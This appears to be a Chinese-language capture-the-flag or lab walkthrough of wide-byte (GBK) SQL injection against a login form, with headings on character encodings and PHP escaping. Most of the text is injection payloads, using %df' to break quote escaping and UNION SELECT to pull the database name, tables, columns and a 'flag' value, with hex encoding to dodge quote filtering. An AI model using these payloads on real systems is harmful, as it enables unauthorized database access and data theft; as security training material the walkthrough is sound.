字符编码
url 编码
GBK编码
utf8 编码
宽字节注入
php中的转译函数
宽字节注入介绍
练习
正常输入没有回显:
cpp
没有回显
username=admin&password=admin
闭合单引号,依旧没有回显
username=admin' and 1=1%23&password=admin
利用宽字节尝试闭合,依旧没有回显
username=admin%df' and 1=1%23&password=admin
换成or连接,回显admin,说明数据库里面没有admin,导致前面的admin是flase,后面是true,and需要保证两个都是ture才能返回ture
username=admin%df' or 1=1%23&password=admin下面我们之间用常规的union来获取数据,先用order by 来测试列数:
cpp
username=admin%df' order by 4 select 1,2,3%23报错回显了,没有那么多列数,说明只有三列:
我们接着用union来测试回显位:
cpp
username=admin%df' union select 1,2,3%23拿到回显列后,直接开始拿数据:
cpp
拿库名
username=admin%df' union select 1,database(),3%23&password=admin
拿表名
username=admin%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=admin
拿列名 #这里的0x666c6167是flag转成16进制后的编码,因为单引号被过滤了,所以通过编码绕过
username=admin%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x666c6167%23&password=admin
拿数据
username=admin%df' union select 1,flag,3 from flag%23&password=admin